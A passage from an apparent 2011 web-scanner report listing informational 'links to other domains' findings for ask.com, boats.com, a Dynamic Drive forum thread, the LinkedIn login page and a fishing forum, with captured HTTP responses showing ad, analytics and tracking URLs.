<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C3LksH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtwzb4aK-dGZKZV3LjtQ71FvL9uvug&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(8); if (typeof efclk != 'undefined') efclk(8); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C3LksH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtwzb4aK-dGZKZV3LjtQ71FvL9uvug&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CXigbH8tBTfzqGsKDmQfW7u3TDe2R_78Br7bGshWQqMEHEAQg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_QLoNL9uebeTYT_lgeer_NG1UK5HUl_RGCckh6awk&num=4&sig=AGiWqtxON8u7C2kzjCZXIJbedQwbVnqh-Q&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(13); if (typeof efclk != 'undefined') efclk(13); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_3');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CXigbH8tBTfzqGsKDmQfW7u3TDe2R_78Br7bGshWQqMEHEAQg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_QLoNL9uebeTYT_lgeer_NG1UK5HUl_RGCckh6awk&num=4&sig=AGiWqtxON8u7C2kzjCZXIJbedQwbVnqh-Q&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(13); if (typeof efclk != 'undefined') efclk(13); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_3');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CesXaH8tBTfzqGsKDmQfW7u3TDZyQkeEBpIyLrBTc66IsEAUg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_QbqZ_9uabeTYT_kkftZAeeYi2_sfKgAU&num=5&sig=AGiWqty0dsNXKLOSQkvjirro2M71JAN9wQ&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(64); if (typeof efclk != 'undefined') efclk(64); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_4');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CesXaH8tBTfzqGsKDmQfW7u3TDZyQkeEBpIyLrBTc66IsEAUg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_QbqZ_9uabeTYT_kkftZAeeYi2_sfKgAU&num=5&sig=AGiWqty0dsNXKLOSQkvjirro2M71JAN9wQ&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(64); if (typeof efclk != 'undefined') efclk(64); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_4');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1009913201?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.36. http://www.ask.com/webadvanced previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/webadvanced

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/webadvanced?o=0&l=dir

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1

Request

GET /webadvanced?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:27 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:27 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:27 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 33926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <title>
Ask.com - Advanced Search
</title>


<met
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

12.37. http://www.boats.com/boat-transport/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boats.com
Path:	/boat-transport/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US

The response contains the following links to other domains:

http://vanimages.yachtworld.com/images/logo_yw.gif
http://vanimages.yachtworld.com/images/logo_yw_print.gif
http://www.yachtworld.com/boat-loans/index.jsp?
http://www.yachtworld.com/core/aboutus/aboutUs.jsp
http://www.yachtworld.com/core/cached/includes/css/dropmenus.css?11.4-Build-62
http://www.yachtworld.com/core/cached/includes/css/stylesheet-print.css?11.4-Build-62
http://www.yachtworld.com/core/cached/includes/css/stylesheet.css?11.4-Build-62
http://www.yachtworld.com/core/corporate/advertiseWithUsHowTo.jsp
http://www.yachtworld.com/core/fsbo/addFsboAd.jsp
http://www.yachtworld.com/core/globalnav/contactUs.jsp
http://www.yachtworld.com/core/globalnav/copyright.jsp
http://www.yachtworld.com/core/globalnav/localeSelect.jsp
http://www.yachtworld.com/core/globalnav/privacy.jsp
http://www.yachtworld.com/core/globalnav/termOfUse.jsp
http://www.yachtworld.com/core/graphics/bookmark_star.gif
http://www.yachtworld.com/core/listing/advancedSearch.jsp
http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=0&ftid=0&enid=0&currencyid=100&luom=126&N=2279&searchtype=topmenu
http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=0&ftid=0&enid=0&currencyid=100&luom=126&N=2280&searchtype=topmenu
http://www.yachtworld.com/core/personalboatshopper/pbs.jsp
http://www.yachtworld.com/globalnav/help/index.html.en
http://www.yachtworld.com/globalnav/sitemap.html.en
http://www.yachtworld.com/includes/web-resources/sprint-28_2010/js/yw/referrer_tracker.js
http://www.yachtworld.com/includes/web-resources/sprint-28_2010/js/yw/yachtworld.js
http://www.yachtworld.com/index.html
http://www.yachtworldcharters.com/

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:49:19 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1296157759693449; path=/; expires=Sat, 29-Jan-11 19:49:19 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_temp_info=lf:ywlf; domain=.boats.com; path=/
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: JSESSIONID=b28ILsFYdlAg; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=687|Accelerated|824|1|0;Expires=Sat, 26-Jan-13 19:49:19 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B10123C94E2C19A;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sat, 29-Jan-11 07:49:19 GMT;Path=/;Domain=.boats.com
X-SL-CompState: Recompiling

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><script>var __$1a49={BaseUrl:(("https:"==document.location.protocol)?"https:":"http:")+"//analytics.strangeloopnetworks.com/",Gi
...[SNIP]...
<META NAME="DCS.dcsaut" CONTENT="">
   <link rel="stylesheet" type="text/css" href="http://www.yachtworld.com/core/cached/includes/css/stylesheet.css?11.4-Build-62" />
   <link rel="stylesheet" type="text/css" href="http://www.yachtworld.com/core/cached/includes/css/stylesheet-print.css?11.4-Build-62" media="print" />

   
<link rel="stylesheet" type="text/css" href="http://www.yachtworld.com/core/cached/includes/css/dropmenus.css?11.4-Build-62" />

   <script type="text/javascript" src="http://www.yachtworld.com/includes/web-resources/sprint-28_2010//js/yw/yachtworld.js"></script>
   <script type="text/javascript" src="http://www.yachtworld.com/includes/web-resources/sprint-28_2010//js/yw/referrer_tracker.js"></script>
...[SNIP]...
<div style="position:absolute;"><img src="http://vanimages.yachtworld.com/images/logo_yw_print.gif" border="0"></div>
...[SNIP]...
<div id="top_logo">
               <a href="http://www.yachtworld.com/index.html"><img src="http://vanimages.yachtworld.com/images/logo_yw.gif" width="390" height="80" vspace="0" hspace="0" border="0" alt="Yachtworld"></a>
...[SNIP]...
<div id="top_small_menu">

   <a href="http://www.yachtworld.com/core/globalnav/localeSelect.jsp">United States (Change)</a>
...[SNIP]...
</span> <img src="http://www.yachtworld.com/core/graphics/bookmark_star.gif" height="18" width="16" hspace="0" vspace="0" border="0" /> <a href="javascript:CreateBookmarkLink('YachtWorld: World\'s Largest Selection of Brokerage Boats for Sale')">
...[SNIP]...
<li><a href="http://www.yachtworld.com/index.html">HOME</a>
...[SNIP]...
<li><a href="http://www.yachtworld.com/core/listing/advancedSearch.jsp">BOATS<!--[if IE 7]>
...[SNIP]...
<li><a href="http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=0&ftid=0&enid=0&currencyid=100&luom=126&N=2280&searchtype=topmenu">Power Boats</a>
...[SNIP]...
<li><a href="http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=0&ftid=0&enid=0&currencyid=100&luom=126&N=2279&searchtype=topmenu">Sailboats</a>
...[SNIP]...
<li><a href="http://www.yachtworld.com/core/listing/advancedSearch.jsp">Advanced Search</a>
...[SNIP]...
<li><a href="http://www.yachtworld.com/core/fsbo/addFsboAd.jsp">Sell Your Boat</a>
...[SNIP]...
<li><a href="http://www.yachtworld.com/core/personalboatshopper/pbs.jsp">Personal Boat Shopper</a>
...[SNIP]...
<li><a href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a href="http://www.yachtworld.com/boat-loans/index.jsp?"><span>
...[SNIP]...
<div id="bottom_nav">
           <a href="http://www.yachtworld.com/core/globalnav/contactUs.jsp" title="contact us">contact us</a> |
           <a href="http://www.yachtworld.com/globalnav/help/index.html.en" title="help">help</a> |
           <a href="http://www.yachtworld.com/core/aboutus/aboutUs.jsp">about us</a> |
           <a href="http://www.yachtworld.com/core/corporate/advertiseWithUsHowTo.jsp">advertise with us</a> |
           <a href="http://www.yachtworld.com/globalnav/sitemap.html.en">site map</a>
...[SNIP]...
<br/>
               <a href="http://www.yachtworld.com/core/globalnav/copyright.jsp" title="Version: 11.3-Build-35, Textual Content: Downloaded from DEV on Fri Mar 07 13:42:12 PST 2008">copyright © 2011 Dominion Enterprises</a> All Rights Reserved. |
               <a href="http://www.yachtworld.com/core/globalnav/termOfUse.jsp">terms of use</a> |
               <a href="http://www.yachtworld.com/core/globalnav/privacy.jsp" title="privacy">privacy</a>
...[SNIP]...

12.38. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.dynamicdrive.com/forums/showthread.php?t=39177&highlight=smooth

The response contains the following links to other domains:

http://acreativellc.com/newsite/nav.php
http://acreativellc.com/newsite/navA/nav.php
http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
http://img229.imageshack.us/img229/8436/20081221145133cruw5.png
http://www.atlanticinkjet.com/canon.asp
http://www.big-boards.com/
http://www.crucialp.com/
http://www.eukhost.com/
http://www.flashmint.com/
http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
http://www.ozzu.com/
http://www.phpbbhacks.com/
http://www.pixel2life.com/
http://www.satelliteinternetpros.com/
http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
http://www.windowshostingasp.net/
http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381
http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381

Request

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:49:30 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bblastvisit=1296157770; expires=Fri, 27-Jan-2012 19:49:30 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 27-Jan-2012 19:49:30 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 82811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...


<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<br />
* For example of the problem, see: <a href="http://acreativellc.com/newsite/nav.php" target="_blank">http://acreativellc.com/newsite/nav.php</a>
...[SNIP]...
<br />
* It works fine with one sub-menu arrow, as seen on <a href="http://acreativellc.com/newsite/navA/nav.php" target="_blank">http://acreativellc.com/newsite/navA/nav.php</a>
...[SNIP]...
<br />
If I move cursor down on to one of the dropdown elements and then move the cursor quickly back up, part of the shadow remains painted on the screen. See <a href="http://img229.imageshack.us/img229/8436/20081221145133cruw5.png" target="_blank">http://img229.imageshack.us/img229/8...45133cruw5.png</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_delicious.gif" border="0" alt="Submit Thread to del.icio.us" class="inlineimg" /></a>

   <a href="http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">del.icio.us</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_stumbleupon.gif" border="0" alt="Submit Thread to StumbleUpon" class="inlineimg" /></a>

   <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">StumbleUpon</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_google.gif" border="0" alt="Submit Thread to Google" class="inlineimg" /></a>

   <a href="http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">Google</a>
</li><li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_digg.gif" border="0" alt="Submit Thread to Digg" class="inlineimg" /></a>

   <a href="http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">Digg</a>
...[SNIP]...
<div id="footer" style="font-size: 12px; text-align: center"><a href="http://www.crucialp.com/" target="_partners">Dedicated Hosting</a> |
<a href="http://www.ozzu.com/" target="_partners">Developer Forum</a> | <a href="http://www.eukhost.com/" target="_partners">Website Hosting</a> | <a href="http://www.pixel2life.com/" target="_partners">Pixel2life</a> | <a href="http://www.phpbbhacks.com" target="_partners">phpBBHacks.com</a> | <a href="http://www.atlanticinkjet.com/canon.asp" target="_partners">Canon Inkjet Cartridges</a> | <a href="http://www.big-boards.com/" target="_partners">Forums</a> | <a href="http://www.flashmint.com" target="_partners">Flash Templates</a> | <a href="http://www.windowshostingasp.net/" title="ASP.NET Hosting" target="_partners">ASP.NET Hosting</a> | <a href="http://www.satelliteinternetpros.com" target="_partners">Satellite Internet</a>
...[SNIP]...

12.39. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The page was loaded from a URL containing a query string:

https://www.linkedin.com/secure/login?session_full_logout=&trk=hb_signout&r=

The response contains the following links to other domains:

https://sb.scorecardresearch.com/b?c1=2&c2=6402952&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
https://secure-us.imrworldwide.com/cgi-bin/m?ci=us-603751h&cg=0&cc=1&ts=noscript
https://secure.quantserve.com/pixel/p-b3sGjMtCFrexE.gif

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:U4lWXkjQ3w6HNUv-nUlaWUIo7h6V_Qw-aOlD2adTz-eYYAWJ39CBGM:1296157780:5c339d93dc107e9f4d21e938ffaf0bab11f63caf"; Version=1; Max-Age=1799; Expires=Thu, 27-Jan-2011 20:19:39 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:49:40 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a421968;expires=Thu, 27-Jan-2011 20:19:49 GMT;path=/;httponly
Content-Length: 13746

<!DOCTYPE html>
<html lang="en">
<head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="description" content="L
...[SNIP]...
<a href="http://www.quantcast.com/p-b3sGjMtCFrexE" target="_blank"><img src="https://secure.quantserve.com/pixel/p-b3sGjMtCFrexE.gif" style="display: none;" height="1" width="1" alt=""></a>
...[SNIP]...
<noscript>

<img src="https://sb.scorecardresearch.com/b?c1=2&c2=6402952&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="">

</noscript>
...[SNIP]...
<noscript>

<img src="https://secure-us.imrworldwide.com/cgi-bin/m?ci=us-603751h&cg=0&cc=1&ts=noscript" width="1" height="1" alt="" style="display:none">

</noscript>
...[SNIP]...

12.40. http://www.reel-time.com/forum/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reel-time.com
Path:	/forum/showthread.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.reel-time.com/forum/showthread.php?t=41911

The response contains the following links to other domains:

http://adserver.adtechus.com/adlink/3.0/5215/895648/0/154/ADTECH;loc=300
http://adserver.adtechus.com/adlink/3.0/5215/895649/0/225/ADTECH;loc=300
http://adserver.adtechus.com/adlink/3.0/5215/943914/0/225/ADTECH;loc=300
http://adserver.adtechus.com/adserv/3.0/5215.1/895648/0/154/ADTECH;loc=300
http://adserver.adtechus.com/adserv/3.0/5215.1/895649/0/225/ADTECH;loc=300
http://adserver.adtechus.com/adserv/3.0/5215.1/943914/0/225/ADTECH;loc=300
http://bp.specificclick.net/?pixid=21009300
http://cdn.media6degrees.com/static/nm1134.js
http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js
http://del.icio.us/post?url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se
http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se
http://e.nexac.com/e/a-1104/s-1985.js
http://edge.quantserve.com/quant.js
http://f.nexac.com/e/a-1104/s-1985.xgi
http://flatasscalm.blogspot.com/
http://js.revsci.net/gateway/gw.js?csid=C09814
http://namemedia.com/enthusiasts/outdoor-sports-sites/
http://pixel.quantserve.com/pixel/p-c5El8QwYYkAh-.gif
http://tomsheehy.home.comcast.net/
http://twitter.com/reel_time
http://www.4njhomes.com/
http://www.extremepixels.com/
http://www.facebook.com/group.php?gid=119446520260
http://www.facebook.com/pages/Reel-Timecom-The-Internet-Journal-of-Saltwater-Fly-Fishing/45320162279
